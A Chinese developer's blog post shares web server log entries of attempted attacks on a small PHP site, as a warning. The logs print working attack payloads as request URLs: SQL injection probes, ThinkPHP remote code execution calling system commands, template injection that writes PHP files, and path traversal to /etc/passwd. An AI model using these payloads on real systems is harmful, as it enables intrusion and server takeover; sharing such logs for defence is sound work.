最近排查服务器日志,发现一些 被人攻击的一些记录;分享一下,避免一些漏洞;
虽然是一个小项目,但是攻击者也想搞到后门;
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/?a=dopara&app_type=shop&c=product_admin&id=1+union+SELECT+1%2C2%2C3%2C40890%2A43445%2C5%2C6%2C7+limit+5%2C1+%23&n=product
ERR: 无法加载控制器:ProductAdmin
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/?a=doSearchParameter&appno=0+union+select+43444%2A40429%2C1--+&c=language_general&editor=cn&n=language&site=admin&word=fuckyou
ERR: 无法加载控制器:LanguageGeneral
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/?n=language&c=language_general&a=doExportPack
ERR: 无法加载控制器:LanguageGeneral
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/cms_channel.php?del=123456+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%28202072102%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--%2B
ERR: 无法加载控制器:CmsChannel.php
[ 2020-08-21T03:06:46+08:00 ] 192.168.0.12 /admin/cms_channel.php?del=123456+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%28202072102%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--%2B
ERR: 无法加载控制器:CmsChannel.php
[ 2020-08-21T03:06:47+08:00 ] 192.168.0.12 /admin/cms_channel.php?del=123456+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%28202072102%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--%2B
ERR: 无法加载控制器:CmsChannel.php
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api.php?c=project&f=index&id=news&sort=1+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%28994262690%29%29%29+--+&token=1234
ERR: 无法加载控制器:Project
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api/sms_check.php?param=1%27+and+updatexml%281%2Cconcat%280x7e%2C%28SELECT+MD5%281234%29%29%2C0x7e%29%2C1%29--+
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api.php?c=project&f=index&id=news&sort=1+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%28994262690%29%29%29+--+&token=1234
ERR: 无法加载控制器:Project
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api/sms_check.php?param=1%27+and+updatexml%281%2Cconcat%280x7e%2C%28SELECT+MD5%281234%29%29%2C0x7e%29%2C1%29--+
ERR: 无法加载控制器:SmsCheck.php
[ 2020-05-17T04:07:27+08:00 ] 192.168.0.12 /api.php?c=project&f=index&id=menu&sort=IF(1=1,1,(select+1+union+select+2))%23
ERR: 无法加载控制器:Project
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /index.php?a=company_focus&c=AjaxPersonal&company_id%5B0%5D=match&company_id%5B1%5D%5B0%5D=aaaaaaa%22%29+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%2899999999%29%29%29+--+a&m=
ERR: 无法加载控制器:AjaxPersonal
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /index.php?function=call_user_func_array&s=%2FIndex%2F%5Cthink%5Capp%2Finvokefunction&vars%5B0%5D=printf&vars%5B1%5D%5B%5D=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91
ERR: 无法加载控制器:\think\app
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /index.php?%22%29=&a=fetch&content=%3C%3Fphp+file_put_contents%28%2214110.php%22%2C%22%3C%3Fphp+echo+1185627289
ERR: 非法操作:fetch
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /mobile/index/index2/id/1%29%20and%20%28select%201%20from%20%28select%20count%28%2A%29,concat%280x716b627671,%28select%20md5%28936989754%29%29,0x716b627671,floor%28rand%280%29%2A2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--
ERR: 非法操作:index2
[ 2020-04-20T03:01:32+08:00 ] 192.168.0.12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=31337
ERR: 无法加载控制器:\think\app
[ 2020-04-22T00:38:11+08:00 ] 192.168.0.12 /index.php?s=index/\think\view\driver\Php/display&content=<?php%20phpinfo();?>
ERR: 无法加载控制器:\think\view\driver\Php
[ 2020-04-22T00:38:11+08:00 ] 192.168.0.12 /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
ERR: 无法加载控制器:\think\app
[ 2020-07-12T04:44:03+08:00 ] 192.168.0.12 /index.php?a=display&templateFile=../../../../../../../etc/passwd
ERR: 非法操作:display
[ 2020-07-12T04:44:04+08:00 ] 192.168.0.12 /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
ERR: 无法加载控制器:\think\app
[ 2020-07-12T04:44:05+08:00 ] 192.168.0.12 /index.php?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Edie(md5('sec_test2019'));%3C/php%3E
ERR: 非法操作:fetch
[ 2020-07-12T04:44:05+08:00 ] 192.168.0.12 /index.php?a=display&templateFile=../../../../../../../etc/passwd
ERR: 非法操作:display
[ 2021-03-22T04:46:29+08:00 ] 192.168.0.12 /?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('secquan.php',base64_decode('PD9waHAgZWNobygiYnVnIGV4aXN0Iik7Pz4='))%3C/php%3E
ERR: 非法操作:fetch
__________________________________________________________________________________
若有帮助到您,欢迎点击推荐,您的支持是对我坚持最好的肯定(*^_^*)
你要保守你心,胜过保守一切。
作者:刘俊涛的博客